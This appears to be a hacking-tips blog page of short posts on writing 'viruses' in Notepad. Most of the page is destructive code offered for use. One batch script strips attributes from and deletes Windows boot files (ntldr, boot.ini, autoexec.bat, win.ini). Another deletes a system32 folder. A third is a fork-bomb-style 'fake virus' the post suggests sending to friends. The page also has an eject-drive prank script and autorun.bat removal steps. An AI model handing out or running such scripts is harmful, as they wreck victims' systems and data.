Click Here

Friday, June 8, 2012

HackingUniversity

hi bloggers,if you want to learn more hacking tips means join as a member to http://www.hackinguniversity.in/...............

Sunday, August 29, 2010

Optical Drive Door Virus

Open the notepad type the following coding

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set oCD = oWMP.cdromCollection.getByDriveSpecifier("J:") ' or whatever
If vbOK = MsgBox ("Eject?", vbOKCancel) Then
oCD.Eject
If vbOK = MsgBox ("Close?", vbOKCancel) Then
oCD.Eject
End if
End if

And save it in to filename.vbs

Tuesday, July 6, 2010

SHUTDOWN VIRUS

First open notepad and type like show below image



And save in to filename.bat ,open the bat file its display a System shutdown dialogue box within
160 seconds computer will turn off shown below the figure


Enjoy!!

Sunday, July 4, 2010

DANGEROUS VIRUS CODE

In the post Show below virus coding is very dangerous, first open the notepad type code

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

save as in to virus.bat file system


VIRUS CODING CREATE IN NOTEPAD

write your own simple virus can’t detected by any antivirus....

@Echo off

Echo virus

Pause

@Echo off
Del C:\window\system32

Note : And save that as .bat file system format

it will delet c:... don’t try its only learning purpose

Friday, July 2, 2010

How to delete virus "autorun.bat"



How to detect virus in your pen drive are PC , First open the command prompt start-->run --> type cmd-->which drive to detect the virus identify it like example G:\> --> type attrib... command prompt virtual all file system and directory, In the drive search any autorun.bat
dos attack if any file system in drive type G:\>attrib -s -h -r autorun.bat and delete that virus G:\> del autorun.bat

Tuesday, June 29, 2010

How Generate the VIRUS

NOTE : Coding learning purpose only
first we see DOS attack,In his DOS attacks to create a fake virus,Its not very dangerous,its fun to send your friend,open the notepad and type start press enter similar type more than 5 times and type virus.bat....then save fake.bat file system enjoy